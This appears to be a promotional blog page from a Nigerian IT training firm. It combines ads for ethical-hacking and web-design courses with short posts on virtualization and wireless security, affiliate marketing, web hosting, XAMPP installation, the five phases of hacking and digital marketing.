  • Move beyond automated vulnerability scans and simple security testing into the world of ethical penetration testing and hacking.
  • More than interesting theories and lecture, get your hands dirty in our dedicated hacking lab in this network security training course.

After SOUTECH’s Penetration Testing Training course, you will be prepared to take (and pass) up to 4 certifications:

  • CEH – Certified Ethical Hacker
  • CPT – Certified Penetration Tester
  • CEPT – Certified Expert Penetration Tester
  • MPCS – Metasploit Pro Certified Specialist

Prerequisites:

  • Firm understanding of the Windows Operating System
  • Exposure to the Linux Operating System or other Unix-based OS
  • Firm understanding of the TCP/IP protocols.
  • Exposure to network reconnaissance and associated tools (nmap, nessus, netcat)
  • Programming knowledge is NOT required
  • Desire to learn about Ethical Hacking, and get great penetration testing training!

Course Cost: N750,000 ( 10% Discount for Educational and Group Training)

Duration: 10 Days

Weekday Option- Mon-Fri( for 2 weeks)-( 9am-3pm dialy)-

Weekend Option-  Sat- 9am-5pm and Sun- 2-6pm( 5 weekends)

Ten Deadly Sins in Virtualization Security: cyber security tips and techniques- SOUTECH Ethical hacking training Nigeria

Ten Deadly Sins in Virtualization Security Virtualization brings manifold benefits to organizations
such as better hardware utilization, cost savings and  flexibility in business operations. However, this new technology with all of its added benefits still has inherent risks. Also, since virtualization is deployed
across computer-based systems, securing the environment is a key priority. This paper looks at the
ten deadly sins of virtualization security.

Virtualization refers to a framework, which allows multiple operating systems to share the
resources of a single underlying server, while at the same time keeping that operating
system isolated from the server. In other words, virtualization involves the sharing of a
common resource by multiple users. A virtualization layer is placed over a single physical
server. This layer hosts multiple virtual machines, and each virtual machine runs an
operating system1 and one or more applications.
The computer and information technology revolution have resulted in increased  dependencies on multiple workstations, servers, hardware devices, communication and network devices. This phenomenon has resulted in increased expenditures on IT infrastructure, and has also created new issues such as the need for adequate space requirements, cooling mechanisms, and of course, adequate power. This is where Virtualization comes in. Virtualization technology has introduced never before seen
benefits that have greatly reduced hardware costs, server consolidation, improved server utilization and lower maintenance costs.

Attend a Certified Ethical Hacking Training in Nigeria– Live Class in Abuja, Online Training from anywhere(Lagos,Port Harcourt, Kano,Ghana- All cities anywhere around the world).

https://www.soutechventures.com/certified-ethical-hacking-training-in-abujanigeria/ 

Read more below

10_Deadly_Sins-in_Virtualization_Security

10 Deadly sins of Wireless Security- SOUTECH Cybersecurity Training tips, hints

Ten Deadly Sins in Wireless Security  The emergence and popularity of wireless devices and wireless networks has provided a platform for real time communication and collaboration. This emergence has created new IT vulnerabilities, which in turn have created the necessity to establish practices that make the wireless environment secure and convenient. in order to reap all of the benefits associated with wireless technology. This paper focuses on the ten deadly sins of Wireless security.

Wireless technology is yet another offshoot of Information and communication technology  revolution. Users now rely extensively on networks for carrying out personal and business activities. Wireless networks provide users with real-time access to information from  anywhere at any time without the constraint of wired networks. In essence, wireless networks provide mobility, unavailable with wired networks. It is easier to install wireless network and systems can be configured to communicate in the wireless environment. As more and more people use wireless devices and avail online services, wireless networking is set to gain inroads into the daily routine of users.

Attend a Certified Ethical Hacking Training in Nigeria– Live Class in Abuja, Online Training from anywhere(Lagos,Port Harcourt, Kano,Ghana- All cities anywhere around the world).

https://www.soutechventures.com/certified-ethical-hacking-training-in-abujanigeria/ 

Read more below

Making cool cash online: smart insider secrets to making sales like a wizard- SOUTECH Tips, Techniques and Tools

WHO WANTS TO BE A MILLIONAIRE?

Just before you start walking tall and wearing that millionaire smile, let me explain. This is not your typical who wants to be a millionaire TV shows were Frank Edoho will ask you some question and you get the answers right to become a millionaire while the spectators cheered at you. Yeah in this program, we have targeted audience as spectators only that there will be no Frank or questions to answer.

HAVE YOU HEARD OF AFFILIATE MARKETING?

Affiliate marketing is a performance-based and how it works is simple. An existing business rewards one or more affiliates for each visitor or customer brought by the affiliate’s own marketing efforts. Technically, four core players are involved in this industry: the merchant (also known as ‘retailer’ or ‘brand’), the network (that contains offers for the affiliate to choose from and also takes care of the payments), the publisher (also known as ‘the affiliate’), and the customer. The market has developed in density, resulting in the development of a secondary tier of players, including affiliate management agencies, super-affiliates and specialized third party vendors.

This is one of the oldest forms of marketing whereby you refer someone to any online product and when that person buys the product based on your recommendation, you receive a commission.

WHAT HAS AFFILIATE MARKETING GOT TO DO WITH ME BE BECOMING A MILLIONAIRE?

It actually has a lot to do with you becoming a millionaire, for instance; you earn N1 as commission-based from any product you recommended, if 1 million Nigerians orders a product via your referral or affiliate link, you have automatically entitled a millionaire. Now I know you will be thinking “that was easy said”. Yeah, way so easy but it is not too good to be true, it is real and require some efforts to achieve. Eventually, the efforts will only cost you a three (3) days intensive training on Website Design and another three (3) days in Essential Digital Marketing training plus 30 days mentoring and support. You will learn how to use the underlying power of web presence to draw “targeted Audience” to you while embedding significant strategies that that will make you a millionaire into your affiliate business. Surprise? Please don’t be, what you never knew is that you can run a successful e-commerce business without carrying any inventory at all? In fact, it’s pretty straightforward to run a full blown online store without worrying about storing or shipping anything physical at all. Drop-shipping has been proven as one most effective way to carry out such e-commerce business. It is a typical online store where you take orders on your own website, but your vendor or distributor is responsible for shipping the product to the end customer.

LET ME GUESS YOU WANT TO ASK ME; HOW DO YOU START?

There are many online companies who sell products such as homeware, electronics, clothing, accessories, web-hosting spaces, or some other service, and they usually offer an affiliate program. For instance, Yuboss is an affiliate program by Yudala where a Youboss member gets products at a slightly cheaper rate, and also gets a commission for selling them through his/her affiliate link. You can simply sign up for any affiliate program and get your unique tracking link. Whenever you want to write about their products/service, all you need to do is simply use this special tracking affiliate link to recommend the company’s site, and if someone make an order via your link, you receive a commission.

HOLD ON, HOLD ONE, HERE COMES THE BIG BOOM

Before you start registering for affiliate programs and start sending your links to individuals, you need to know this hidden secret. First imagine, that Konga is not an e-commerce store, rather, an affiliate for other e-stores? Yeah, according to Philips consulting online shopping report of 2014, the following findings was made;

  • Warehouses are located in Lagos, but also operate from other major cities. In addition, it is common to have thousands of merchants scattered across the nation to facilitate service delivery.
  • On average, the leading online stores achieve about $2 million worth of transactions per week i.e approximately N1.3biilion per month.
  • Not less than 500 orders are placed in a day with each retailer (nationwide);
  • Currently, no fewer than 300 nationwide deliveries are made in a day with each retailer;
  • Items being returned to the online store are an infrequent occurrence; presently, no more than 20% of delivered items are returned to the seller;
  • Online merchants most often make use of their own delivery facilities and staff to convey items to customers; however, external couriers such as DHL, UPS and Fedex are sometimes used for out-of-state deliveries.
  • Over 38% Nigerians shop online with 43% Nigeria agrees that their in-store purchase has reduced since the introduction of online shopping in Nigeria.
  • Some major challenges faced by online retailers is poor customer service culture, city navigation and logistical issues, and under-stocked items.

NOW YOU KNOW WHERE I WAS HEADING

So let’s rephrase the question; what if you become one of the highest seller/reseller in e-commerce simply by participating in an affiliate program in a different concept. Take a look at www.buyallsoftwares.com. Buyallsoftwares.com is actually an e-store where you can purchase any type of software you want in Nigeria. You can have an e-store like buyallsoftwares.com where you can display products from different e-store you are affiliated with.

WAIT! FIRST THING FIRST

I understand you want to jump into affiliate marketing immediately, but there are skills you will need to in order to stand and remain standing tall.

Soutech Web Consult has design training courses that will advance your knowledge into becoming a successful affiliate marketer. These training includes; Digital Marketing and Website Designing of which you will be trained in relevant areas in order to acquire necessary skills to effectively utilize this secret. You learn how to build your own e-store, discover selling products that will be profitable to market and most returned products, including how your customers can contribute in increasing sales.

A lot of people always misunderstand “niche marketing.” Niche marketing means focusing on a specific target market – electronics, clothing, homeware, etc. Niche marketing does NOT imply targeting the smallest market probable, which is what most people do. Remember these words: BIG MARKETS ARE BETTER.

See you at SOUTECH

SOUTECH Web Consults Training Courses

Web Design, Ethical Hacking, Networking, Mobile App Development, Project Management, Graphics and Branding, Advance Excel for Bankers/Statisticians and Research Experts and many more!

Click here for details:  https://www.soutechventures.com/courses/

Best website hosting service in Nigeria- Learn Web Design Skills in Abuja, Lagos, Port Harcourt Nigeria

WEB HOSTING, WHAT DOES THAT MEANS?

One of the questions we hear often from new students or client who wants to learn or venture into web design and development is – what is web hosting and how does it work?

Well, think of hosting as a house, it could be an apartment building or lake view terrace that you rented for a particular purpose, in our context website. Websites are hosted on web servers and in order to get your website hosted, you will pay for a web-hosting service. You will be given a space to run your business, just an empty space with no shelf, no furnishing although it is easy to furnish your space by installing any framework you want choosing from the many that come in with your cPanel account. If you do not have a hosting service, you will have a place to put your files and the domain name you bought (if you already have), will be just a virtual house address with no physical building. To run a website, you will need basically three things; domain name, Hosting and Web content. Your web content includes text and media files that needed a space to be stored in, which is where web hosting comes in play.

CHOOSING A HOSTING PLAN.

When choosing a web hosting plan, you should first consider what type of website you are going to be running. Is it going to house members? Will it be a database driven website or static HTML? Will it be strictly informational? Will you be running an e-commerce store? How huge are your website files? What is your estimated traffic? All these will affect the choice of hosting you want.

Just like the housing illustration, most web-hosting providers offers three main categories consisting of Shared, VPS and Dedicated Servers.

Shared Hosting – This is hosting type is more like an apartment building, where you neighbor and everyone is using the same resources. If one of the neighbours is over-using a resource, it can affect the others on the server. It is the cheapest and most common type of hosting. Many people start out on a shared hosting plan.

VPS – Virtual Private Servers are much like a townhome, or row house. Each account is like its own home unit. They have separate resource allocation and are in much more control over their site environment. However, just like in a shared, tenants that overuse resources may have an effect on the other accounts on the server. This doesn’t happen often on a VPS than a shared server.

Dedicated server – This is like owning your own house, the entire building is yours. In other words, the entire server is yours. All the resources are dedicated to your account, so no one else can bother you on the server. Just like a house, it varies in sizes, so you may need to upgrade to larger dedicated servers as your website grows.

Irrespective of the hosting category you choose, you will still have to decide on the size of space and amount of allocated bandwidth you will want to acquire. You can always upgrade to increase space and bandwidth as you desire in future.

Website content /files are what your visitors and potential customers actually see when the visit you site. The site files are not different from any other file you normally use, like a .jpg photograph, or .mp3 music file. Though, website files are also. PHP files or .html files, which are PHP scripts or HTML pages respectively.

Web hosting services works simply by giving us a storage space where our website files will be stored in high-powered computers (web servers) connected to a very fast network. In web-hosting, anything correlated to managing these servers and its software, security, support, bandwidth, speed and so much more, is known and web server management.

I hope you now understand what is web-hosting, do not forget to order a hosting space with us, visit http://www.soutechhosting.com

Learn website design today- Online or Offline! Dont miss it, Start Learning to Earn

www.soutechventures.com/courses

How to build and design a website within 3 days: SOUTECH Web design training school Abuja, Nigeria

Learning how to build a website is much more fun than painstaking as often presumed. You can learn how to build your own website within just days. Gone are the days when you must have to be a web programmer learn how to code before building websites. Today, with the emergence and development of content management system, building websites has become much easier. A lot of content management systems are open source, which means you can use them freely and also modify the codes to achieve what you want to achieve. Also, the open source content management systems have led to the development and website templates, components and plugins which add some specific functionalities on our websites.

You can easily change website layout, colour and fonts styles with just a few clicks and add functionalities by installing desired plugins and components.

Some widely used content management systems include:

  • WordPress
  • Joomla
  • Drupal
  • Open
  • Magenta and so much more

YOU CAN ALSO TRY WYSIWYG

Although building websites with CMS is recommended, building without CMS can also be achievable and fun as well. There many WYSIWYG (what you see is what you get) website editors that make creating a website easy. Some WYSIWYG editor like Adobe Dreamweaver also gives you the opportunity learn some HTML tags and codes by splitting the windows into design view and editor view. Microsoft Expression Web is also a good WYSIWYG editor with lots of features that are fun to explore.

If you are not a fan of GUI, there are also IDE editors that you can make use of such as;

  • Aptana Studio
  • Brackets
  • Codelite
  • Netbeans
  • Notepad++
  • PHPeD
  • PHPStorm

 BEGINNERS LOVE CMS

Though PHP frameworks such as Laravel, has proven to be a better practice in web development, especially for OOP (Object Oriented Programing) projects, beginners still find it easy to learn website design using CMS. CMS offers many advantages to designers, developers and content managers for speedy development and to some extent simple access to advanced features. You can easily install new website templates seamlessly without altering the website content. Some CMS will include everything you need to implement an integrative online marketing strategy. Most CMS will contain tools for search engine optimization, email and sms marketing, social media marketing and blogging. You can also use a CMS with necessary plugins to create event registration forms, collect fees and donations, and store member information.

 SOUTECH MAKES IT EASY

Despite the fact that building websites using CMS is easy, some knowledge and skills are required in order to make effective use of the software mentioned above. These skills and knowledge can be learned by completing a certificate course on Website Design Management. Soutech has designed this course to enable you to become acquainted with content management system. You have the options to either have a live training which I recommend, or order for our visual training online via www.soutechventures.com

Becoming  a website designer expert is easy at Soutech Web Consult, Soutech has design a complete CMS Website Design package that makes enables you to become a WordPress CMS Expert.

Do you want to become an expert website designer? Be able to build websites for school, churches, institutions, government agencies,hotels and just for about any body.?

What to become a partner and start reselling softwares? visit : www.buyallsoftwares.com

Do you want to buy over 150 ICT Training home kits?  https://buyallsoftwares.com/product-category/dvd-training-kits/

Do you want to buy any antivirus?  https://buyallsoftwares.com/product-category/antivirus-softwares/

Buy iTunes gift card and get 24hrs Delivery: https://buyallsoftwares.com/product-category/gift-cards-2/

5 Steps to hacking(ethical hacking)- SOUTECH Cyber security tips, techniques and tools guide 2017

The 5 Phases Every Hacker Must Follow- Part 1

Originally, to “hack” meant to possess extraordinary computer skills to extend the limits of computer
systems. Hacking required great proficiency. However, today there are automated tools and codes
available on the Internet that makes it possible for anyone with a will and desire, to hack and succeed.
Mere compromise of the security of a system does not denote success. There are websites that insist on
“taking back the net” as well as those who believe that they are doing all a favor by posting the exploit
details. These can act as a detriment and can bring down the skill level required to become a successful
attacker.
The ease with which system vulnerabilities can be exploited has increased while the knowledge curve
required to perform such exploits has shortened. The concept of the elite/super hacker is an illusion.
However, hackers are generally intelligent individuals with good computer skills, with the ability to create
and explore into the computer’s software and hardware. Their intention can be either to gain knowledge
or to dig around to do illegal things. Attackers are motivated by the zeal to know more while malicious
attackers would intend to steal data. In general, there are five phases in which an intruder advances an
attack:
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Covering Tracks

Watch out for Part 2.

Attend a Comprehensive Certified  Ethical Hacking ver. 9 Training at SOUTECH 

Job Roles after taking the course

  • Security Analyst
  • Security Operations Center (SOC) Analyst
  • Vulnerability Analyst
  • Penetration Test Expert
  • Cybersecurity Specialist
  • Threat Intelligence Analyst
  • Security Engineer

Click Here for details.

Curled from EC-Council

Local Web Development via a server: Learn how to start developing websites- SOUTECH

So you have just found web development interesting and want to learn or you are a beginner in web development? Whichever category you belong; you will definitely find this article interesting and useful. During my first three months as a beginner in web design, I recall how difficult it was for me to see my codes displayed on the browsers as intended. Most times the HTML display just fine while some PHP and JavaScript will not display as intended and I often wonder what is it that I am not doing right, that before I meet a good friend called “Local Server”. Off cause, PHP is a server-side language, so you will definitely need a server to run it.

Local Server

Local Server often called a localhost is a software with some built-in functionalities that make your website looks just like it should when it is been hosted on a live server. You will need a local server if you intend to install and run a Content Management System on your computer. It can be accessed by pointing your browser to 127.0.0.1 or http://localhost, at some point you might need to add a port i.e. http://localhost:8080. To install a local server on a windows computer you have an option to choose between XAMPP (X-Cross-Platform, A-Apache, M-MariaDB, P-PHP and P-Perl) and WAMP (Windows, Apache, MySQL, PHP). I prefer XAMPP which works just fine for me and other developers find it to be awesome. Don’t worry both packages are open source.

Functionality

The two regular functions often used are the server (which is apache) and database (MariaDB). The Apache server which is known to be the best server in the world, serving HTTP document over the internet allows your website to be published locally for testing. MariaDB is one of the most popular open source database servers created by the original developers of MySQL, it allows for database creation when building a data-driven website.

How to install

We will use this guide to install XAMPP on our local server. So with no wasting of time head straight tohttps://www.apachefriends.org/index.html choose the version of XAMPP you prefer to download (I suggest you choose the one with a widely used PHP version).  After the download is complete, you need to open the folder where you saved the file, and double-click the installer file.

First, you will be prompted to select the language you wish to use in XAMPP. Click the arrow in the drop-down box to select your desired language from the list, then click OK to continue the installation process.

If you are using Windows 7 or higher, you will see a pop-up window, warning you about User Account Control (UAC) being active on your system. Do not panic, just click OK to continue the installation.

Next, you will see the Welcome to The XAMPP Setup Wizard screen. Click Next to continue the installation.

The next dialogue screen will allow you to choose which components you would like to install. To run XAMPP properly, all components checked need to be installed. Click Next to continue.

It is time for you to Choose Install Location screen. Unless you would like to install XAMPP on another drive, you should not change anything. Click Install to continue.

Relax while XAMPP extract files to the location you selected in the previous step.

Once all of the files have been extracted, the Completing The XAMPP Setup Wizard screen will appear. Click Finish to complete the installation.

Click Yes to open the XAMPP Control Panel after you have click Finish in the previous screen.

You now have a local server.

A local server is idle for testing when building websites and web applications. XAMPP needs to be configured properly for better functionality. To learn more about building web applications and testing with a local server, I recommend you enroll in a web design training at Soutech Web Consult.

Why you should start digital marketing TODAY: SOUTECH Ventures business growth guide

WHY YOU SHOULD “SWITCH” TO DIGITAL MARKETING

Digital marketing has not just been proved as the substratum of marketing, it also encases how cost effective marketing can be done, with a higher rate of an outcome. Technology itself has taken over a seemingly command over almost everything. Today, technology has adopted a face of digitalization, which has suddenly started looking like a quicksand, where everything has been absorbed and turned into a new digital world. Today the concept of digital marketing with or without organic and inorganic techniques, allows individuals and entities to bring their businesses and services on the internet and establish it by means of online marketing.

Digital marketing refers to advertising and promoting businesses, services, and brands through digital media channels. A digital media channels can be any platform that can deliver information electronically, such as websites, social media, mobile, e-mails, radio, television, billboards.

The Cost Effective Marketing

Regardless the size of your pocket, digital marketing can help in establishing your business portfolio in a more productive manner, where every resource spent would generate value. The “switch” to digital media is being driven by marketing agencies, business owners and consumers alike. The increasing demand to show quantifiable results has made going digital a dream for every marketing agency.

The cost of digital marketing is very low to an extent, especially for business owners. Having an effective web presence whilst engaging customers in conversations through social media and e-mail marketing, are low-cost alternatives to print advertising. In a simple illustration I would say; if you are to share flyers to some people using print media, each flyer has a cost and there is no guarantee that a person you give a flyer will gain interest. But in digital marketing, all you need is one flyer in soft-copy which can be broadcast to as many persons as possible.

You should be where you can be found

The easiest way consumers can find your business is by whipping out their phone and search for products or items they intend to purchase, if your digital marketing strategy is effective and using the right keywords appropriately, your business and services will experience a robust growth globally. While every business has some kind of product and every product needing promotion, promotions must follow a strategy starting with a unique approach called digital marketing. No marketing techniques had ever had the kind of reach that digital marketing has achieved. For instance, any update you make on social media networks like facebook, in no time it will be notice and conversation will start on that update. In the instance of digital marketing, that update could be a new product or about a new service.

Taking the first step

A good approach to digital marketing, I would say starts by having a website that does the following:

  • Adequately represents your business and brand (look and feel, messaging)
  • Adequately speaks to your target audience
  • Can be found by searchers on top search engines
  • Is up-to-date and easily navigable
  • Provides multiple channels for customer communication
  • Connects to other marketing efforts

Of great importance is the need to be consistent. If you are not consistent in your digital marketing approach then you might not get your desired results.


Also focus is very key to getting on top of google search engine results. There is nothing as using a good content marketing strategy to attract your potential customers and clients to your website.

Soutech Web Consult is an I.T company that specialized in providing solutions in both I.T and E-business. At Soutech, a Training on Digital Marketing will shape your knowledge towards engaging in effective digital marketing.

Click Below:

Enroll for a digital marketing training today.